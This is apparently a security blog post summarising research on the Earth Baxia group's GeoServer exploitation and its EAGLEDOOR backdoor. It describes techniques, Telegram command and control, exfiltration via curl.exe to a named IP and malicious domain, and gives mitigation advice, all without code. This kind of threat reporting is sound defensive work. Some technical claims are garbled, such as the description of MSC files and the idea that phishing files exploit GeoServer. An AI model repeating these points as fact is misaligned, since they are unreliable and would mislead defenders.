Chinese Hackers Exploit GeoServer Flaw to Deploy EAGLEDOOR Malware

In an alarming development in cybersecurity, researchers from Trend Micro have uncovered a sophisticated attack campaign orchestrated by a Chinese-linked Advanced Persistent Threat (APT) group known as “Earth Baxia.” This Chinese Hackers Exploit vulnerabilities in GeoServer—a popular open-source server used for sharing and processing geospatial data—to deploy a malware known as EAGLEDOOR. This blog delves into the details of the attack, the vulnerabilities exploited, and recommendations to protect against such threats. 

Understanding GeoServer and Its Vulnerabilities 

What is GeoServer? 

GeoServer is an open-source server written in Java that enables users to share, process, and edit geospatial data. It supports various data formats and integrates seamlessly with mapping applications like Google Maps and OpenLayers. Its flexibility makes it an essential tool for organizations that rely on web mapping and spatial data infrastructure. 

The Exploited Vulnerability: CVE-2024-36401 

The primary vulnerability exploited by Earth Baxia is designated as CVE-2024-36401, a Remote Code Execution (RCE) flaw in GeoServer. This vulnerability allows attackers to execute arbitrary code on affected systems, providing them with a foothold to deploy further malicious payloads. Given GeoServer’s widespread use, this vulnerability poses a significant risk to organizations utilizing this software, particularly in sensitive sectors. 

The Attack Vector of Chinese Hackers Exploit

Targeting APAC Countries 

Earth Baxia has primarily targeted government agencies, telecommunications, and energy sectors across several Asia-Pacific (APAC) countries, including Taiwan, the Philippines, South Korea, Vietnam, and Thailand. Their tactics include sophisticated spear-phishing attacks designed to trick individuals into executing malicious files. 

Spear-Phishing with MSC Files 

The attack typically begins with spear-phishing emails containing malicious MSC (Microsoft Common Script) files, often labeled as “RIPCOY.” These files exploit the vulnerabilities in GeoServer, allowing the attackers to execute their code upon opening. 

Infection Chain and Payload Deployment 

Techniques Employed 

The infection chain employed by Earth Baxia is complex, leveraging various techniques to ensure successful deployment of the EAGLEDOOR malware. Notable techniques include: 

• AppDomainManager Injection: This method allows attackers to inject malicious code into legitimate applications, making detection difficult. 

• GrimResource: A technique to facilitate the downloading of malicious payloads from cloud services, including AWS and Aliyun. 

Customized Cobalt Strike Components 

Once the initial access is achieved, Earth Baxia deploys customized Cobalt Strike components, including: 

• SWORDLDR: A shellcode loader used to execute further payloads. 

• EAGLEDOOR: The primary backdoor employed in the attack, allowing for extensive control over the compromised systems. 

Features and Functionality of EAGLEDOOR 

Multi-Protocol Support 

EAGLEDOOR boasts multi-protocol communication capabilities, utilizing protocols such as DNS, HTTP, TCP, and even Telegram. This adaptability enables the attackers to maintain communication with compromised systems, even in the face of potential disruptions. 

Loader Mechanism 

The loader for EAGLEDOOR employs DLL side-loading techniques, specifically using files named Systemsetting.dll and Systemsetting.exe. This method aids in evading detection by masquerading as legitimate files. 

Backdoor Operations 

EAGLEDOOR features several critical operations, including: 

• API Hooking: This is accomplished via a component named Hook.dll, enabling the malware to intercept and manipulate API calls made by other applications. 

• Core Operations: Managed by Eagle.dll, this component handles the essential functions of the backdoor. 

Command and Control via Telegram 

One of the more unique aspects of EAGLEDOOR is its use of the Telegram Bot API for command and control (C2) communications. This includes methods such as: 

• getFile 

• getUpdates 

• sendDocument 

• sendMessage 

By leveraging Telegram, attackers can maintain a robust communication channel while minimizing the risk of detection by traditional security measures. 

Evading Detection and Maintaining Persistence 

Obfuscation Techniques 

To evade detection and maintain persistence on compromised systems, Earth Baxia employs various obfuscation techniques, including: 

• Base64 Encoding: This technique disguises the payloads, making them harder to analyze and detect by security systems. 

• AES Encryption: Used to secure communication and payloads, further complicating efforts to identify malicious activities. 

Data Exfiltration Process 

The exfiltration of stolen data is carefully executed. The collected information is archived, and tools like curl.exe are used to upload the data to remote file servers, such as the one identified with the IP address 152.42.243.170. This process underscores the need for robust monitoring of outgoing network traffic. 

Initial Access and Tool Delivery 

Diverse Initial Access Methods 

Earth Baxia employs various methods for initial access, including the use of MSC and LNK (link) files to deliver their malicious toolsets. This diversity in attack vectors increases their chances of success, as different users may respond to different types of phishing attempts. 

Decoy Documents and Malicious Components 

Researchers identified specific websites, such as Static.krislab.site, that Earth Baxia utilized to spread decoy documents alongside Cobalt Strike components. These sites host files like Edge.exe, msedge.dll, and Logs.txt, all of which are deployed using PowerShell commands to execute the payloads. 

Recommendations for Mitigation 

In light of the tactics employed by Earth Baxia, organizations must take proactive measures to safeguard their systems. Here are some key recommendations: 

1. Continuous Phishing Awareness Training 

Regular training sessions can significantly enhance employees’ ability to recognize phishing attempts and malicious files. By fostering a culture of security awareness, organizations can reduce the likelihood of successful attacks. 

2. Multi-Layered Protection Solutions 

Implementing a multi-layered security approach is crucial. This includes: 

• Firewalls 

• Intrusion Detection Systems (IDS) 

• Endpoint Protection Platforms (EPP) 

These layers can help detect and mitigate threats before they can exploit vulnerabilities. 

3. Vigilant Cybersecurity Practices 

Organizations should maintain vigilant cybersecurity practices, including: 

• Regularly updating and patching software, especially critical systems like GeoServer. 

• Conducting routine security audits and vulnerability assessments. 

• Monitoring network traffic for unusual activities. 

Conclusion 

The exploitation of GeoServer vulnerabilities by Earth Baxia underscores the evolving landscape of cyber threats. By understanding the tactics employed by threat actors and implementing robust security measures, organizations can better protect themselves against the risks posed by sophisticated malware like EAGLEDOOR. As the threat landscape continues to evolve, vigilance and proactive measures are key to maintaining cybersecurity resilience. 

Frequently Asked Questions about Chinese Hackers Exploit

​​References 

​​Senapathi, V. (2024, September 24). Chinese Hackers Exploiting GeoServer Flaw To Deploy EAGLEDOOR Malware. Retrieved from Cyber Security News: https://cybersecuritynews.com/chinese-hackers-exploit-geoserver-eagledoor/